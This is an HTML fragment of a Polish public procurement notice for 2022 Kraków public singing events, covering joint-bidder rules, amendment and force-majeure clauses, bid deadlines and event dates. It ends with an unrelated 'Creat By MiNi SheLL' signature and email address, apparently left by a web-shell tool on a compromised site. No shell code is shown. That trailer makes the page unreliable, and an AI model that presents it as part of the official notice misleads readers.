o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie.<br/>2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>składają:<br/>2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a<br/>ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot.<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.2. jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;<br/>2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dot. podmiotu<br/>udostępniającego zasoby – jeżeli dotyczy);<br/>2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają<br/>dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument,<br/>także dokument wskazany w pkt 6.2.2. SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum)<br/>ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia<br/>należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana treści umowy może nastąpić wyłącznie w granicach art. 455 ust. 1 ustawy z dnia 11 września 2021 r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony. Wykonawca na piśmie przedstawi okoliczności będące przyczyną proponowanych zmian.<br/>2. Zmiana umowy, o której mowa wyżej, może nastąpić wyłącznie w przypadkach:<br/>1) ewentualnej zmiany podwykonawców, z zastrzeżeniem posiadania przez tych podwykonawców, co najmniej takich samych właściwości (kwalifikacji), pod rygorem niedopuszczenia podwykonawców do wykonywania zamówienia;<br/>2) zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne, do realizacji danej części zamówienia oraz właściwości, w zakresie wymaganym dla Wykonawcy, a dotyczącym braku podstaw do wykluczenia z postępowania;<br/>3) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy;<br/>4) zmiana osób przy realizacji przedmiotu zamówienia;<br/>5) zmiana sposobu spełnienia świadczenia - na skutek niedostępności na rynku materiałów/urządzeń niezbędnych do wykonania przedmiotu umowy z zastrzeżeniem, że nie będzie stało to w sprzeczności z zapisami ustawy;<br/>6) zmiany wynagrodzenia na skutek niedostępności na rynku materiałów/urządzeń niezbędnych do wykonania przedmiotu;<br/>7) realizacji zamówień dodatkowych obejmujących ekran ledowy;<br/>8) zmiany terminu realizacji poszczególnych wydarzeń w przypadku:<br/>a) zaistnienia niekorzystnych i nieprzewidzianych przez Strony warunków atmosferycznych, w tym klęski żywiołowej lub innej siły wyższej,<br/>b) okoliczności leżących po stronie Zamawiającego, spowodowanych w szczególności: opóźnieniem w odbiorze przedmiotu Umowy, potrzebą bądź koniecznością udostępnienia obiektów innym podmiotom, przekazaniu Wykonawcy dokumentacji lub informacji, do przekazania których Zamawiający jest zobowiązany na mocy niniejszej Umowy, zmianą sposobu wykonania w stosunku do przewidzianego w toku postępowania, ze względu na ujawniony w trakcie realizacji stan<br/>techniczny przedmiotu Umowy.<br/>3. Siła wyższa jest to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec, ani nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązań. Siła wyższa obejmuje w szczególności, następujące zdarzenia:<br/>1) wojnę, działania wojenne, działania wrogów zewnętrznych;<br/>2) terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa;<br/>3) skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywna, z wyjątkiem tych które mogą być spowodowane użyciem ich przez Wykonawcę;<br/>4) epidemia, pandemia w tym zakazy i nakazy wprowadzone w związku z ogłoszonym stanem epidemii na terytorium RP;<br/>5) klęski żywiołowe: huragany, powodzie, trzęsienie ziemi;<br/>6) bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy Wykonawcy i jego podwykonawców;<br/>7) inne wydarzenia losowe.<br/>4. Strona dotknięta czynnikami losowymi powinna niezwłocznie poinformować druga Stronę pocztą elektroniczna lub w innej formie pisemnej o zaistnieniu tych okoliczności lub o ich ustąpieniu.<br/>5. Braków surowcowych, niedoborów siły roboczej, zastosowanie części wadliwych i przerw w pracy nie uznaje się jako czynników losowych.<br/>6. Strona inicjująca zmianę obowiązana jest do złożenia wniosku o zmianę, ze wskazaniem opisu zmiany oraz jej uzasadnienia, jak również wpływu zmiany na kształt bądź termin realizacji Umowy.<br/>7. Zmiany nieistotne nie wymagają aneksu. Zmianą nie wymagającą aneksu jest w szczególności:<br/>a. zmiana siedziby którejkolwiek ze Stron,<br/>b. zmiana osób upoważnionych do realizacji czynności wynikających z Umowy, <br/>c. zmiana osób wskazanych do kontaktu, zarówno ze strony Zamawiającego, jak i Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 10.Za datę przekazania oferty, dokumentów, informacji i oświadczeń oraz ich cyfrowych odwzorowań przyjmuje się datę ich przekazania na ePUAP lub datę i godzinę serwera pocztowego Zamawiającego.<br/>11. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx,<br/>.odt., ze szczególnym wskazaniem na .pdf.<br/>12. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może zawsze dokonać notariusz. Ponadto szczegółowe zasady poświadczania różnych kategorii dokumentów opisuje § 6 ust. 3 oraz § 7 ust. 3 Rozporządzenia przywołanego w pkt 11 powyżej.<br/>13. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi, a w miejscach gdzie jest to wyraźnie wskazane także słownie (nie stosuje się wyrażenia „jw.” i równoważnych).<br/>14. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>15. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których mowa w pkt 6.1.2. lit. a SWZ, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>16. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych środków dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.4. SWZ powyżej oraz rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>dodatkowe informacje do pkt 4.2.10) ogłoszenia - Termin wykonania zamówienia:<br/>KRAKOWSKA LEKCJA ŚPIEWANIA „MAJOWA JUTRZENKA” Z OKAZJI ŚWIĘTA KONSTYTUCJI<br/>Termin: 3 maja 2022r.<br/>Miejsce: Mały Rynek<br/>KRAKOWSKA LEKCJA ŚPIEWANIA „KADRÓWKA 1914”<br/>Termin: 5 sierpnia 2022r.<br/>Miejsce: Mały Rynek<br/><br/>KRAKOWSKA LEKCJA ŚPIEWANIA „RADOSNA NIEPODLEGŁOŚCI” Z OKAZJI ŚWIĘTA NIEPODLEGŁOŚCI<br/>Termin: 11 listopada 2022r.<br/>Miejsce: Rynek Główny<br/>KRAKOWSKA LEKCJA ŚPIEWANIA „KOLĘDY DO ŚPIEWANIA PO DOMACH”<br/>Termin: grudzień 2022r., dokładny termin do ustalenia w trybie roboczym (np. ostatnia niedziela przed wigilią)<br/>Miejsce: Mały Rynek<br/>c.d. pkt 7.4.<br/>8. 8. Zamawiający zastrzega możliwość wypowiedzenia umowy w trybie natychmiastowym bez konsekwencji prawnych i finansowych w sytuacji wprowadzenia nakazów i zakazów związanych z epidemią Sars-CoV-2, które uniemożliwią realizacje przedmiotu umowy w ustalonym terminie. Wykonawca wyraża na powyższe zgodę i zrzeka się wszelkich roszczeń w stosunku do Zamawiającego z tym związanych.

Creat By MiNi SheLL
Email: jattceo@gmail.com